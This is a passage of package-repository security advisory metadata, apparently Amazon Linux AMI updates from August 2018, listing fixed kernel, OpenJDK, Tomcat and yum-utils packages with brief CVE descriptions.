name="kernel-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.59-64.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1049</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1049: critical priority package update for kernel</title><issued date="2018-08-04 23:48:00" /><updated date="2024-05-23 21:37:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5390:
A flaw named SegmentSmack was found in the way the Linux kernel handled specially crafted TCP packets. A remote attacker could use this flaw to trigger time and calculation expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() functions by sending specially modified packets within ongoing TCP sessions which could lead to a CPU saturation and hence a denial of service on the system. Maintaining the denial of service condition requires continuous two-way TCP sessions to a reachable open port, thus the attacks cannot be performed using spoofed IP addresses.
CVE-2018-13405:
A vulnerability was found in the fs/inode.c:inode_init_owner() function logic of the Linux kernel that allows local users to create files with an unintended group ownership and with group execution and SGID permission bits set, in a scenario where a directory is SGID and belongs to a certain group and is writable by a user who is not a member of this group. This can lead to excessive permissions being granted when they should not be.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13405" title="" id="CVE-2018-13405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5390" title="" id="CVE-2018-5390" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package 
name="kernel-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.59-64.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1054</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1054: medium priority package update for java-1.8.0-openjdk</title><issued date="2018-08-09 16:07:00" /><updated date="2018-08-09 21:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2952:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are Java SE: 6u191, 7u181, 8u172 and 10.0.1; Java SE Embedded: 8u171; JRockit: R28.3.18. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1600925:
CVE-2018-2952 OpenJDK: insufficient index validation in PatternSyntaxException getMessage() (Concurrency, 8199547)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2952" title="" id="CVE-2018-2952" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-src" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.181-8.b13.39.39.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.181-8.b13.39.39.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package 
name="java-1.8.0-openjdk-devel" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1055</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1055: important priority package update for tomcat7 tomcat80</title><issued date="2018-08-09 16:10:00" /><updated date="2018-08-09 21:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8034:
The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.
1607580:
CVE-2018-8034 tomcat: host name verification missing in WebSocket client
CVE-2018-8014:
The default settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable &#039;supportsCredentials&#039; for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.
1579611:
CVE-2018-8014 tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins
CVE-2018-1336:
An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86.
1607591:
CVE-2018-1336 tomcat: A bug in the UTF-8 decoder can lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1336" title="" id="CVE-2018-1336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8014" title="" id="CVE-2018-8014" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8034" title="" id="CVE-2018-8034" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat80-lib" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-lib-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-servlet-3.1-api" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-servlet-3.1-api-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-el-3.0-api" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-el-3.0-api-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-docs-webapp" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-docs-webapp-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-log4j" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-log4j-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-webapps" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-webapps-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-jsp-2.3-api" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-jsp-2.3-api-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-admin-webapps" version="8.0.53" release="1.80.amzn1" 
epoch="0" arch="noarch"><filename>Packages/tomcat80-admin-webapps-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-javadoc" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-javadoc-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.90" release="1.33.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-webapps-7.0.90-1.33.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1056</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1056: important priority package update for tomcat8</title><issued date="2018-08-09 16:12:00" /><updated date="2018-08-09 21:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8037:
A bug in the tracking of connection closures can lead to reuse of user sessions in a new connection. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.9 and 8.5.5 to 8.5.31.
1607582:
CVE-2018-8037 tomcat: Due to a mishandling of close in NIO/NIO2 connectors user sessions can get mixed up
CVE-2018-8034:
The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.
1607580:
CVE-2018-8034 tomcat: host name verification missing in WebSocket client
CVE-2018-8014:
The default settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable &#039;supportsCredentials&#039; for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.
1579611:
CVE-2018-8014 tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins
CVE-2018-1336:
An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder, causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86.
1607591:
CVE-2018-1336 tomcat: A bug in the UTF-8 decoder can lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1336" title="" id="CVE-2018-1336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8014" title="" id="CVE-2018-8014" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8034" title="" id="CVE-2018-8034" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8037" title="" id="CVE-2018-8037" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.32" release="1.78.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.32-1.78.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1057</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1057: important priority package update for yum-utils</title><issued date="2018-08-09 16:13:00" /><updated date="2018-08-09 21:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10897:
A directory traversal issue was found in reposync, a part of yum-utils, where reposync fails to sanitize paths in remote repository configuration files. If an attacker controls a repository, they may be able to copy files outside of the destination directory on the targeted system via path traversal. If reposync is running with heightened privileges on a targeted system, this flaw could potentially result in system compromise via the overwriting of critical system files.
1600221:
CVE-2018-10897 yum-utils: reposync: improper path validation may lead to directory traversal
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10897" title="" id="CVE-2018-10897" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="yum-updateonboot" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-updateonboot-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-ps" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-ps-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-rpm-warm-cache" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-rpm-warm-cache-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-tmprepo" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-tmprepo-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-ovl" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-ovl-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-fastestmirror" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-fastestmirror-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-auto-update-debug-info" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-auto-update-debug-info-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-filter-data" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-filter-data-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-versionlock" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-versionlock-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package 
name="yum-plugin-remove-with-leaves" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-remove-with-leaves-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-pre-transaction-actions" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-pre-transaction-actions-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-show-leaves" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-show-leaves-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-tsflags" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-tsflags-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-utils" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-utils-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-local" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-local-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-upgrade-helper" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-upgrade-helper-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-refresh-updatesd" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-refresh-updatesd-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-changelog" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-changelog-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-protectbase" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-protectbase-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-copr" version="1.1.31" 
release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-copr-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-aliases" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-aliases-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-merge-conf" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-merge-conf-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-keys" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-keys-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-post-transaction-actions" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-post-transaction-actions-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-priorities" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-priorities-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-verify" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-verify-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-puppetverify" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-puppetverify-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-list-data" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-list-data-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-NetworkManager-dispatcher" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-NetworkManager-dispatcher-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-fs-snapshot" version="1.1.31" release="46.30.amzn1" epoch="0" 
arch="noarch"><filename>Packages/yum-plugin-fs-snapshot-1.1.31-46.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1058</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1058: critical priority package update for kernel</title><issued date="2018-08-10 20:26:00" /><updated date="2018-08-14 17:53:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5391:
CVE-2018-3646:
CVE-2018-3620:
CVE-2018-3615:
